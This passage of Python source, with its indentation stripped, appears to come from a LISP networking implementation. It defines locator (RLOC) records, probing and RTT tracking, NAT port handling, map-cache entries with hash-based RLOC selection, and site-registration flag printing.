#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-12] + "." + count[-12:-9] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
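#
# Worked example (hypothetical counters): if 10000 packets and 10000000
# bytes arrived since the last check 5 seconds ago, then:
#
#   packet-rate = 10000 / 5 = 2000 pps
#   bit-rate    = ((10000000 / 5) * 8) / 1000000 = 16.0 Mbps
#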
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Any time a new
# lisp_packet.packet_error value is added, a corresponding key string
# needs to be added to this dictionary.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This is a locator record definition as defined in the LISP RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple, so we can RLOC-probe
# each path individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different from the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out" + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl/60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
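#
# Worked example for print_ttl() (hypothetical values): a map_cache_ttl
# of 7200 secs prints as "2 hours", 5400 secs prints as "90 mins", and
# 45 secs prints as "45 secs". A ttl of None prints as "forever".
#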
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh the entry once 90% of
# the TTL has elapsed.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
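#
# Worked example for has_ttl_elapsed() (hypothetical values): with a
# map_cache_ttl of 60 secs, almost_ttl is 60 - 6 = 54 secs, so the entry
# reports elapsed once 54 seconds have passed since last_refresh_time.
#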
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endfor
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply that will never arrive.
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put each RLOC in lisp.lisp_rloc_probe_list if it isn't already
# there. And if we removed an RLOC from the best list, we need to
# remove its references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
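#
# Sketch of build_best_rloc_set() behavior (hypothetical RLOC-set): with
# RLOCs at priorities 1 (up), 1 (unreach), and 2 (up), the best priority
# is 1, so both priority-1 RLOCs go in best_rloc_set (the unreachable one
# so it keeps getting RLOC-probed) and the priority-2 RLOC is excluded.
#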
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
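#
# Worked example of the fold above (hypothetical hash): for an IPv6
# inner header, hashval 0x12345678 folds to (0x1234 + 0x5678) = 0x68ac,
# then to (0x68 + 0xac) = 0x114. The RLOC index is then 0x114 % length.
#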
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# If this RLOC is not in up state because it was taken out of up state
# by not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachable RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting a nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
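# The inner loop uses 'rloc' as a sentinel: it is set to None when a
# match is found, so after the loop 'rloc' still equals the last element
# of rloc_address_set only if no match was found for this rloc_entry.
#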
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
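#
# Worked example for star_secondary_iid() (hypothetical values): with
# secondary_iid 2000, the prefix string "[1000,2000]10.0.0.0/8" becomes
# "[1000,2000*]10.0.0.0/8". With no secondary IID the prefix is returned
# unchanged.
#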
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
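#
# Sketch of print_flags() output (hypothetical registration): an ETR
# that requested proxy map-replies, included an xTR-ID, and asked for
# Map-Notifies, but set no other flags, prints as "P-s-I-t-r-m-N". The
# html variant wraps each letter with its lisp_site_flags description.
#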
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
